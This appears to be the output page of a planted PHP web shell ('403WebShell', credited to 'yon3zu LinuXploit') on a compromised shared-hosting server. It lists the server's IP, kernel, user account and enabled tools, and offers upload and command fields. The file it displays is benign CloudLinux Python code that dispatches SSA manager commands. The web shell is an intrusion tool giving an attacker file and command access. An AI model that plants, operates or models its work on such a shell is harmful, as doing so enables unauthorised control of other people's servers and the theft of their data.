Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.139.239.25
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/cloudlinux/venv/lib64/python3.11/site-packages/ssa/ssa_utils/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/cloudlinux/venv/lib64/python3.11/site-packages/ssa/ssa_utils/run_manager.py
# -*- coding: utf-8 -*-

# Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2021 All Rights Reserved
#
# Licensed under CLOUD LINUX LICENSE AGREEMENT
# http://cloudlinux.com/docs/LICENSE.TXT

"""
This module contains SSA manager utility main run function
"""
import sys
from .cmdline_parser import cmd_parser_manager, parse_cmd_arguments
from .validations import validate
from ..internal.utils import configure_logging
from ..internal.constants import manager_log
from ..manager import initialize_manager
from ..internal.exceptions import SSAError


def run() -> None:
    """
    Main run function
    """
    configure_logging(manager_log)
    try:
        args = parse_cmd_arguments(cmd_parser_manager())
        cmd, validated_args = validate(args.__dict__)
    except SSAError as e:
        print(e)
        sys.exit(1)
    manager_run(cmd, **validated_args)


def manager_run(command, *args, **kwargs):
    """
    SSA Manager run function
    """
    try:
        manager_instance = initialize_manager()
        if command == 'set-config':
            result = manager_instance.set_config(kwargs)
        elif command == 'get-config':
            result = manager_instance.get_config()
        elif command == 'get-ssa-status':
            result = manager_instance.get_ssa_status()
        elif command == 'enable-ssa':
            result = manager_instance.enable_ssa()
        elif command == 'disable-ssa':
            result = manager_instance.disable_ssa()
        elif command == 'get-report':
            result = manager_instance.get_report()
        elif command == 'get-stat':
            result = manager_instance.get_stats()
        else:
            raise SSAError(f'Unknown action {command}')
        print(result)
    except SSAError as e:
        print(e)
        sys.exit(1)

Youez - 2016 - github.com/yon3zu
LinuXploit